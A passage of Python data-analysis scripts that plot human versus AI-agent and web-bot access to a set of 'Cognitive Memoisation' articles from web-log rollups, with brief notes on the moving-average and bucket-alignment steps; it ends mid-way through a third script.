#  2026-03-09 OpenAI - derived from access; plots human blue vs machine green
#                     using the same rollups / manifest workflow.

import os, re, math, csv
from datetime import datetime, timezone, timedelta
from urllib.parse import unquote
import argparse

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Patch

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "machine.png"
out_svg = "svg-machine.svg"
out_tsv = "tsv-machine.tsv"

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)",
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human amplification factor (default=40.0)",
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------
RENAME_MAP = {
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",
    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}

LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours
H_COLOR = "#1f77b4"   # blue
G_COLOR = "#2ca02c"   # green
BASELINE_COLOR = "#000000"


def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")


def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    return RENAME_MAP.get(s, s)


def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs


def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)


# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title", "safe_file", "pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate bucket counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
if not rollup_files:
    raise RuntimeError("No rollup TSV files found")

first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c: i for i, c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# AI only = ai_* rollup bucket family.
machine_cols = [c for c in header if c.lower().startswith("ai_")]

if not machine_cols:
    raise RuntimeError("No ai_* columns found in rollup header")

machine_idx = [col_index[c] for c in machine_cols]


H = {}
G = {}

BUCKET_SECONDS = None
min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")

    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue

            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            # Blue: page-only human_get_ok, matching the existing lifecycle semantics.
            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v

            # Green: ai_* actor buckets on both page and meta carriers.
            s = 0
            for idx in machine_idx:
                try:
                    s += int(row[idx])
                except Exception:
                    pass
            if s:
                G[(bstart, title)] = G.get((bstart, title), 0) + s

MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))
if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0

H_series = {}
G_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_g = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_g[k] = G.get((bdt, t), 0)
    H_series[t] = arr_h
    G_series[t] = arr_g


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


H_ma = {t: ma_center_zero(H_series[t], MA_BUCKETS) for t in eligible_titles}
G_ma = {t: ma_center_zero(G_series[t], MA_BUCKETS) for t in eligible_titles}

H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
G_log = {t: np.log1p(G_ma[t]) for t in eligible_titles}

global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], G_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)
if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}


def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    g_total = int(np.sum(G_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, a:{g_total})"


# Optional TSV export for audit / comparison.
with open(out_tsv, "w", newline="") as f:
    w = csv.writer(f, delimiter="\t")
    w.writerow(["title", "publication_z", "human_total", "machine_total"])
    for t in ordered:
        w.writerow([t, compact_zulu(pub_dt[t]), int(np.sum(H_series[t])), int(np.sum(G_series[t]))])


fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (G_log[t] * scale), alpha=1.0, color=G_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)
ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5


def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)


major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)
ax.set_xticks(major)
ax.set_xticks(minor, minor=True)
ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")
ax.tick_params(axis="x", which="minor", labelbottom=False)

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs AI Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKET={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP}"
)
ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP·x); up)"),
        Patch(facecolor=G_COLOR, edgecolor=G_COLOR, label="machine (Σ ai_* buckets; MA; ln(1+x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()

print(out_png, out_svg, out_tsv)

humanbot.py (new)

Human get_200_304 versus web bots (indexers et al.)
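Both series in this script pass through the same zero-padded centered moving average used by the other lifecycle scripts before log compression. A small sketch of that smoothing on a synthetic spike (values are hypothetical):

```python
import numpy as np

def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    # Centered moving average with zero padding, as in the lifecycle scripts.
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float), (k, k), mode="constant", constant_values=0.0)
    return np.convolve(xp, np.ones(win) / win, mode="valid")

# A single-bucket spike of 9 accesses is spread over the window...
spike = np.array([0, 0, 9, 0, 0], dtype=float)
sm = ma_center_zero(spike, 3)  # [0, 3, 3, 3, 0]
```

Zero padding keeps the output the same length as the input while preserving the total mass of an interior spike, which is why the (h:…, b:…) row totals remain comparable before and after smoothing.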

#!/usr/bin/env python3

# History
#  2026-03-09 OpenAI - derived from access; plots human blue vs web bots pink
#                     using the same rollups / manifest workflow.

import os, re, math, csv
from datetime import datetime, timezone, timedelta
from urllib.parse import unquote
import argparse

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Patch

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "wbot.png"
out_svg = "svg-wbot.svg"
out_tsv = "tsv-wbot.tsv"

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)",
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human amplification factor (default=40.0)",
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------
RENAME_MAP = {
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",
    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}

LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours
H_COLOR = "#1f77b4"   # blue
G_COLOR = "#e377c2"   # pink
BASELINE_COLOR = "#000000"


def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")


def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    return RENAME_MAP.get(s, s)


def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs


def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)


# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title", "safe_file", "pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate bucket counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
if not rollup_files:
    raise RuntimeError("No rollup TSV files found")

first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c: i for i, c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# Bots only = bot_* rollup bucket family.
bot_cols = [c for c in header if c.lower().startswith("bot_")]

if not bot_cols:
    raise RuntimeError("No bot_* columns found in rollup header")

bot_idx = [col_index[c] for c in bot_cols]

H = {}
G = {}

BUCKET_SECONDS = None
min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")

    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue

            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            # Blue: page-only human_get_ok, matching the existing lifecycle semantics.
            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v

            # bot: all bot actor buckets on both page and meta carriers.
            s = 0
            for idx in bot_idx:
                try:
                    s += int(row[idx])
                except Exception:
                    pass
            if s:
                G[(bstart, title)] = G.get((bstart, title), 0) + s

MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))
if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0

H_series = {}
G_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_g = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_g[k] = G.get((bdt, t), 0)
    H_series[t] = arr_h
    G_series[t] = arr_g


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


H_ma = {t: ma_center_zero(H_series[t], MA_BUCKETS) for t in eligible_titles}
G_ma = {t: ma_center_zero(G_series[t], MA_BUCKETS) for t in eligible_titles}

H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
G_log = {t: np.log1p(H_AMP * G_ma[t]) for t in eligible_titles}

global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], G_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)
if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}


def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    g_total = int(np.sum(G_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, a:{g_total})"


# Optional TSV export for audit / comparison.
with open(out_tsv, "w", newline="") as f:
    w = csv.writer(f, delimiter="\t")
    w.writerow(["title", "publication_z", "human_total", "machine_total"])
    for t in ordered:
        w.writerow([t, compact_zulu(pub_dt[t]), int(np.sum(H_series[t])), int(np.sum(G_series[t]))])


fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (G_log[t] * scale), alpha=1.0, color=G_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)
ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5


def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)


major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)
ax.set_xticks(major)
ax.set_xticks(minor, minor=True)
ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")
ax.tick_params(axis="x", which="minor", labelbottom=False)

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs Bots Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKET={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP}"
)
ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP*x); up)"),
        Patch(facecolor=G_COLOR, edgecolor=G_COLOR, label="machine (Σ bot_* buckets; MA; ln(1+H_AMP*x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()

print(out_png, out_svg, out_tsv)

humanallmachin.py

Human get_200_304 versus all machines.
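All of these scripts align bucket timestamps to a publication-relative index by first flooring the publication instant to its bucket start, then counting whole buckets between the two. A minimal sketch, assuming a hypothetical 6-hour bucket (the real scripts derive BUCKET_SECONDS from the rollup filenames):

```python
from datetime import datetime, timezone, timedelta

BUCKET_SECONDS = 6 * 3600  # hypothetical bucket size for illustration

pub = datetime(2026, 1, 30, 1, 55, tzinfo=timezone.utc)

# Floor the publication instant to its containing bucket start.
pub_bucket = datetime.fromtimestamp(
    (int(pub.timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc
)

# A bucket three windows later maps to relative index 3.
bucket = pub_bucket + timedelta(seconds=3 * BUCKET_SECONDS)
rel = int((bucket - pub_bucket).total_seconds() // BUCKET_SECONDS)  # 3
```

Flooring to the bucket grid first guarantees that rel is always an exact integer, so rel index 0 is the bucket containing the publication instant and the x-axis zero line lands on it.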

#!/usr/bin/env python3

# History
#  2026-03-09 OpenAI - derived from access; plots human blue vs all machines brown
#                     using the same rollups / manifest workflow.

import os, re, math, csv
from datetime import datetime, timezone, timedelta
from urllib.parse import unquote
import argparse

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Patch

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "all.png"
out_svg = "svg-all.svg"
out_tsv = "tsv-all.tsv"

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)",
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human amplification factor (default=40.0)",
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------
RENAME_MAP = {
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",
    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}

LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours
H_COLOR = "#0057B8"   # blue
# G_COLOR = "#008F39"   # green
G_COLOR = "#CD853F" # peru brown
BASELINE_COLOR = "#000000"


def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")


def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    return RENAME_MAP.get(s, s)


def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
